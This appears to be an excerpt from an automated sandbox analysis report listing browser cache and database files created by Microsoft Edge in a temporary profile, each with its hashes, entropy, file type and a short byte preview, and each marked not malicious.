SHA1:	E2FAFFD451011B0AB7AC79CA99DB09F717D881AB
SHA-256:	2B8A5A8CB38DB1C0A1525EB269AB571154CF08F498FCDF3FF21501E52EA7655D
SHA-512:	A04D00CF5A8EABD0B0CA71C926BFF929447ACFE5973BA0DFBB6298C47D487EEC0809F420F1512C67C2D81C03B344171977F243FCB8650BED0DBE838732D915E6
Malicious:	false
Preview:	.....%e..asset..}i..F.._.........L..-..m..m..fCQ..$. @.`.{v....,.........[h....DU.??Y.<MTU...J.....O...On.'.&\|'..J'...~.......e.L......\|&c.~6...{.......JA.w.^.....z......3....cUEe..M..a.Tu.. ...W/^..~.b.\|.X._............?....r..~..v.Xw.W.......t....W...3.......Y>./U...r...o./.....{Kw2I.o.........}...?f......:......)..}.<....U..I].?,.....O../.o./...O....>.~k.....\|....o......u.q........."..n".....e.z..)...w....o.....9......a.2_...~.>....s7~...I....".......s...............j..e.../..........d*...?.SO...J.7w.z2{.N..^.y..........ut..W...t..T.U.>hM%..j...l.N.e9W....D.J...N.VQ....Z.....ri....'..j......E.nU.hC..^W.{.\.s%.J.7i.>..M. ..\..).K.kM.q.x'.:.w...u>.N.GU..e..>>....B..N3[...A......B.M]....=JV.2.T..J...\|^...:cMv[.]....m.....5'.z..u...4..Q.@...AJ.......J..l..\|W..5...3k...2..U.Y.u%......o...<..,V?..m.y.R..+.u..j.....N.L.j.o4._.P.k..y..wm.......\|.....T....e}.iz...c.a../.b.....0....R.....'.....sU^O.p..?.........v.En.......waS.:a0..+dL..'.&.t

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	524656
Entropy (8bit):	5.027445846313988E-4
Encrypted:	false
SSDEEP:	3:LsulCr:Ls
MD5:	E286D8FE00F0A6B9B65763757ED95982
SHA1:	C387C563CB81ABAF0954938F936BC4C68B096FC7
SHA-256:	6152C98BCA18CB432971A5E1CB2D8697ACB624FD640CCD5534064B3FD2A9F0B5
SHA-512:	308637C0E1BA17857052D42416C893D5C9C12D9CE82A700B9F191375DE30320CAE76CFB6905D29439A304390F97DFBDD5AECAF1B96F50B9ABFC1910E18DCB85B
Malicious:	false
Preview:	.........................................X.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.955557653394731
Encrypted:	false
SSDEEP:	3:GB5HyyEZVpN:GB5S9Z5
MD5:	4CE3A3739FF703CE37E798052CCA0EC0
SHA1:	8B08D2BBB93AF2CDEE795DAD44ECB3CC4D16EE99
SHA-256:	05C15CBC6C117FD844EB73552E513EC484E1BFE9010ABFA74FDFAFB75BCC0F15
SHA-512:	786665B3E4A95384501C812709D7E4A2803E0133263C2AAEB940E2335D7BE58132543400F495E0A1FCF11CD28793330ED7349C68A6ECDDF3FA1D175D776EACC7
Malicious:	false
Preview:	(......#oy retne.........................;o../.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.955557653394731
Encrypted:	false
SSDEEP:	3:GB5HyyEZVpN:GB5S9Z5
MD5:	4CE3A3739FF703CE37E798052CCA0EC0
SHA1:	8B08D2BBB93AF2CDEE795DAD44ECB3CC4D16EE99
SHA-256:	05C15CBC6C117FD844EB73552E513EC484E1BFE9010ABFA74FDFAFB75BCC0F15
SHA-512:	786665B3E4A95384501C812709D7E4A2803E0133263C2AAEB940E2335D7BE58132543400F495E0A1FCF11CD28793330ED7349C68A6ECDDF3FA1D175D776EACC7
Malicious:	false
Preview:	(......#oy retne.........................;o../.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:k42HFXTEqP:kgM
MD5:	272FCE994943427BAEC9E43C3E217DF2
SHA1:	F50D327B32C0240E830F3EEFE9C650E594E7A37B
SHA-256:	EAA402853C83F0C4D31A6068C4791397EA9036E2FAFE7A6B2973B635C13617A4
SHA-512:	18CCBCEB936D5D7EB2729C3DEB2AC2FED042761CA46F42013EC0EC9249F800EB21E429DDDF6790416E2D47E26475075814E75E3F09E35CBD0CB9B29F6788D9CA
Malicious:	false
Preview:	(.......oy retne..........................i../.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:k42HFXTEqP:kgM
MD5:	272FCE994943427BAEC9E43C3E217DF2
SHA1:	F50D327B32C0240E830F3EEFE9C650E594E7A37B
SHA-256:	EAA402853C83F0C4D31A6068C4791397EA9036E2FAFE7A6B2973B635C13617A4
SHA-512:	18CCBCEB936D5D7EB2729C3DEB2AC2FED042761CA46F42013EC0EC9249F800EB21E429DDDF6790416E2D47E26475075814E75E3F09E35CBD0CB9B29F6788D9CA
Malicious:	false
Preview:	(.......oy retne..........................i../.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4351464020915919
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwjfBI:TouQq3qh7z3bY2LNW9WMcU4B
MD5:	7DB15A0E3CFE9C43522CF49ECE450F2E
SHA1:	A195D4F4A064FD651AED3BB2027A157C0C413059
SHA-256:	D0CAEB5CBE48AC7F3C7965CA578C6ED9AC827558FCB3B91409B767C23E2DED57
SHA-512:	E062BB6D297DEEBD6C4D8D2839922C4EA0209D1DD8E933DEC4A9E4D14A326AF33B2E0C5833D47188EA02976A9C23D9B7849F8D05077E63D52AB385E015011731
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\DawnCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\DawnCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\DawnCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\DawnCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNl1rl:Ls31r
MD5:	EEB7CA85748126FDD3BD47B607756BB8
SHA1:	B04139B82541D0499100DEFE8A6F2296224ACE6B
SHA-256:	222A8D81D1BD1BECA5D1B9013D8F29E6CEF210B42AABE04CE0E1E2F50F51F63D
SHA-512:	490A08968014A04E6EF68B0C215C0B9DDCF09340A46D80A55FB3B7C52BFECDB9BA6378B382F2D21C521F495173E8942C74BB1BF54A1D68AF68117F97B8E584BE
Malicious:	false
Preview:	........................................Zw.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeCoupons\coupons_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.2051579002858475
Encrypted:	false
SSDEEP:	6:iOHOQFl1wkn23fpEcG2tbB2KLldA9+q2Pwkn23fpEcG2tMsIFUv:7fFYfX9VFL89+vYfX9GFUv
MD5:	328B736F6E06808C179D7CB8DE067B40
SHA1:	C9D57ED06B69C9A9E743FCB8FF8A91D7CB43CAA1
SHA-256:	95A2D2C2FB6E7A143DC3DBCBFA61E7ABE96087589DAF533DAA427DC3DD257F72
SHA-512:	E09A08BF6E8E5C6B67EFADF2677B9FE1C971859E7C42D3FD8AFC6C27D9667D12B9A3F9CEDDFF8B8A72B65CF78DD7A5239CA1FE7723E89EE5338037C196EFEC96
Malicious:	false
Preview:	2025/01/05-02:32:33.375 bec Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeCoupons/coupons_data.db since it was missing..2025/01/05-02:32:33.839 bec Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeEDrop\EdgeEDropSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.494709561094235
Encrypted:	false
SSDEEP:	24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
MD5:	CF7760533536E2AF66EA68BC3561B74D
SHA1:	E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
SHA-256:	E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
SHA-512:	38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5094712832659277
Encrypted:	false
SSDEEP:	12:TLW4QpRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7me5q4iZ7dV:TLqpR+DDNzWjJ0npnyXKUO8+j25XmL
MD5:	D4971855DD087E30FC14DF1535B556B9
SHA1:	9E00DEFC7E54C75163273184837B9D0263AA528C
SHA-256:	EC7414FF1DB052E8E0E359801F863969866F19228F3D5C64F632D991C923F0D2
SHA-512:	ACA411D7819B03EF9C9ACA292D91B1258238DF229B4E165A032DB645E66BFE1148FF3DCFDAC3126FCD34DBD0892F420148E280D9716C63AD9FCDD9E7CA58D71D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	409
Entropy (8bit):	5.774249421166689
Encrypted:	false
SSDEEP:	6:iptA6R6rPgS9nkdF89PRTwXrDVB8WN8fRUm/YHqSIyoBSN7WnUxNSQYHJSe:TFrPNjFpwvwvem/qVIRB6SUxNaHJ
MD5:	254BBE2CC085958BBB7369AFE6907860
SHA1:	CCE8E1D82373F3570A11BA2099D0C6FB49830395
SHA-256:	3E2701FB4E735E0A071AA6199FB243DDC97F2FE297B624C1D94475F49DEBCD2A
SHA-512:	4A46365A18C2A5C5E3E245DFBD7A82143430E1D5AFB32E7EC0B34C2F839125CD3D0D3A20264CF75E761A9A809FBF10C90104820B43FF5EB944B323C526166B1A
Malicious:	false
Preview:	...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2...13380535966184903..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	293
Entropy (8bit):	5.1899938701544155
Encrypted:	false
SSDEEP:	6:iOHq1wkn23fpED2WwnvB2KLldVAN+q2Pwkn23fpED2WwnvIFUv:7VfUxwnvFL5AN+vYfUxwnQFUv
MD5:	A51EDB785590C6C1125034BDDED7E309
SHA1:	34D95055D6B7FB0DDFAE39B22E77A5691F9BB987
SHA-256:	A767CBD95038813779ED00A40684D062136825A611F7B59742C39C280BDA259E
SHA-512:	F1160F991DC76A6DE71FC8DE8D164220621DCC61CD5912B91EBA2A734F801E4C496277FC8874F6F17929C4DF8CDE39372FC20614F5E34A1CAF1596FACA7C63BB
Malicious:	false
Preview:	2025/01/05-02:32:45.006 204c Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EntityExtractionAssetStore.db since it was missing..2025/01/05-02:32:45.297 204c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Rules\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	171
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
MD5:	E952942B492DB39A75DD2669B98EBE74
SHA1:	F6C4DEF325DCA0DFEC01759D7D8610837A370176
SHA-256:	14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
SHA-512:	9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Rules\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	263
Entropy (8bit):	5.135696658099953
Encrypted:	false
SSDEEP:	6:iOHh1wkn23fpENaVdg2KLld2TN1WM+q2Pwkn23fpENaPrqIFUv:7kfkLy51L+vYf73FUv
MD5:	A5B05504FEA127E170C85F2241C230AA
SHA1:	16221ACC5A1583A9804540FCA4DBD52FE0E3D4AC
SHA-256:	A58C32615CD8E9AD8167F5F7683D37EEA34C6F0DD6E0FD4DCA72812546FD2165
SHA-512:	DDF628C8D278F1F21A1AA1B898F6341CD728785528BCFB8FEDCB10E890A33A09E431EBB8FD92FC6CE3F8D991397E625734BF73E6E49B04AB813DDD29DEF537E5
Malicious:	false
Preview:	2025/01/05-02:32:33.380 4ac Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Rules since it was missing..2025/01/05-02:32:33.411 4ac Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Rules/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Rules\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Extension Scripts\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
